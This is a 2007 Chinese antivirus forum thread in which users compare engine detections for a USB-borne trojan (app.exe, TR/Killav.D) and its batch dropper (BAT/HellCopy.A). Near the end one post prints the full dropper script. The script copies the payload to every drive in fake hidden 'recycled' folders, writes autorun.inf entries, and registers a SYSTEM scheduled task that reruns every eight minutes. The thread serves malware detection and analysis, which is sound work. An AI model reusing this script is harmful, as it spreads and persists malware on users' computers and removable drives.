过NOD32，卡吧的app.exe样本。红伞报

billy_xx

在线扫描过NOD32，卡吧的app.exe样本。该病毒发作时会在每个分区的根目上建立名为“recycled”的隐藏系统文件夹，伪装成回收站。其中有名为chengdu...的一个文件夹，内含压缩包内的三个文件。

mofunzone

u盘病毒

Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\����.rar'
C:\Users\morgan\Documents\
  ����.rar
    [0] Archive type: RAR
    --> н¨Îļþ¼Ð\App.bat
    --> н¨Îļþ¼Ð\app.EXE
        [DETECTION] Is the Trojan horse TR/Killav.D
        [WARNING]   Infected files in archives cannot be repaired!
    --> н¨Îļþ¼Ð\apprun.inf
        [INFO]      The file was deleted!


End of the scan: 2007年11月25日  11:16
Used time: 00:05 min

The scan has been done completely.

      0 Scanning directories
      4 Files were scanned
      1 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      3 Files not concerned
      1 Archives were scanned
      1 Warnings

dericyeoh

kis8 found nothing

will

avast Win32:Trojan-gen {Delphi}

附上运行后生成的bat   这个bat才是种植病毒的功臣！
小红伞报此bat为BAT/HellCopy.A


[ 本帖最后由 yimike 于 2007-11-26 08:53 编辑 ]

啊弥陀佛

微点砍掉

sam.to

原帖由 yimike 于 2007-11-26 08:25 发表
avast Win32:Trojan-gen {Delphi}

附上运行后生成的bat   这个bat才是种植病毒的功臣！
小红伞报此bat为BAT/HellCopy.A
158447

Kaspersky Internet Security 7.0The requested URL http://bbs.kafan.cn/attachment.php?aid=158447 is infected with Virus.BAT.HellCopy.a virus

sam.to

原帖由 billy_xx 于 2007-11-26 02:34 发表
在线扫描过NOD32，卡吧的app.exe样本。该病毒发作时会在每个分区的根目上建立名为“recycled”的隐藏系统文件夹，伪装成回收站。其中有名为chengdu...的一个文件夹，内含压缩包内的三个文件。

kis不报，已上报

Graybird

Starting the file scan:

Begin scan in 'E:\bt6001.zip'
E:\bt6001.zip
  [0] Archive type: ZIP
  --> bt6001.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/HellCopy.A
      [INFO]      The file was deleted!

dikex

1. echo off
   
2. if NOT EXIST .\dnt\APP.BAT %systemroot%\explorer \
   
3. xcopy /c /q /y /i /h /r /k app.exe %systemroot%\system32\1027\ || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\app.exe %systemroot%\system32\1027\
   
4. xcopy /c /q /y /i /h /r /k app.bat %systemroot%\system32\1027\dnt\ || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\app.bat %systemroot%\system32\1027\dnt\
   
5. xcopy /c /q /y /i /h /r /k app.bat %systemroot%\system32\1027\ || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\app.bat %systemroot%\system32\1027\
   
6. xcopy /c /q /y /i /h /r /k apprun.inf %systemroot%\system32\1027\ || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\apprun.inf %systemroot%\system32\1027\
   
7.   
   
8. for %%I in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
   
9.         md %%I:\tem
   
10.         if exist %%I:\tem\.. (
    
11.                 md %%I:\recycled
    
12.                 md %%I:\recycled\CEC-chengdu...\
    
13.                 xcopy /c /q /y /i /h /r /k app.exe %%I:\recycled\cec-ch~1\*.* || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\app.exe %%I:\recycled\cec-ch~1\*.*
    
14.                 xcopy /c /q /y /i /h /r /k apprun.inf %%I:\recycled\cec-ch~1\*.* || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\apprun.inf %%I:\recycled\cec-ch~1\*.*
    
15.                 xcopy /c /q /y /i /h /r /k app.bat %%I:\recycled\cec-ch~1\*.* || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\app.bat %%I:\recycled\cec-ch~1\*.*
    
16.                 xcopy /c /q /y /i /h /r /k apprun.inf %%I:\autorun.* || xcopy /c /q /y /i /h /r /k recycled\CEC-ch~1\apprun.inf %%I:\autorun.*         
    
17.                 attrib +s +r +h %%I:\recycled
    
18.                 attrib +s +r +h %%I:\autorun.inf
    
19.         )
    
20.         rd %%I:\tem
    
21. )
    
22. schtasks /create /tn "My App" /tr %systemroot%\system32\1027\dnt\app.bat /sc MINUTE /mo 8 /ru "System" /st 08:00:00 /ed 2050/12/31

复制代码

貌似慢了

[ 本帖最后由 dikex 于 2007-11-26 10:05 编辑 ]

HC303

毒霸和瑞星都KILL掉了。